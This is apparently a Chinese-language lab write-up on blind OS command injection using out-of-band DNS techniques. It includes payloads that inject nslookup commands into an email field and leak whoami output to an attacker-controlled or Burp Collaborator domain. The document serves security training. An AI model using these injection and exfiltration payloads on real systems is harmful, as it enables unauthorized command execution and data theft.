5、利用带外(OAST)技术
1、简述:
可以使用一个注入命令,该命令将触发与您使用OAST技术控制的系统的带外网络交互。例如:
& nslookup kgji2ohoyw.web-attacker.com &
此有效负载使用nslookup命令对指定的域进行DNS查找。攻击者可以监视指定查找的发生,从而检测到命令已成功插入。
2、带外通道还提供了一种从注入命令中提取输出的简单方法:
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
这将导致对攻击者的域进行DNS查找,该域包含whoami命令:
wwwuser.kgji2ohoyw.web-attacker.com
2、涉及实验:
实验4:具有带外交互的盲OS命令注入
实验5:具有带外数据泄漏的盲操作系统命令注入
实验4:具有带外交互的盲OS命令注入
part1:
填写反馈信息
使用Burp Suite拦截和修改提交反馈的请求
part2:
打开BP的Collaborator客户端
复制服务器URL(这个是我的BP的提供的服务器)
4injhpna543tc1766dwv1466ux0noc.burpcollaborator.net
part3:
发送到repeater
修改email参数,将其更改为:
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN|| 我的是: email=x||nslookup+4injhpna543tc1766dwv1466ux0noc.burpcollaborator.net||
part4:
修改数据包,并关闭拦截
实验5:具有带外数据泄漏的盲操作系统命令注入
part1:
填写反馈信息
使用Burp Suite拦截和修改提交反馈的请求
part2:
打开BP的Collaborator客户端
复制服务器URL(这个是我的BP的提供的服务器)
fl45n2ug5x4nmill7s67s7u7jypodd.burpcollaborator.net
part3:
发送到repeater
修改email参数,将其更改为:
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN|| 我的是: email=x||nslookup+`whoami`.fl45n2ug5x4nmill7s67s7u7jypodd.burpcollaborator.net||
part4:
修改数据包,并关闭拦截
part5:
完成实验
我的用户peter-WKvUPX
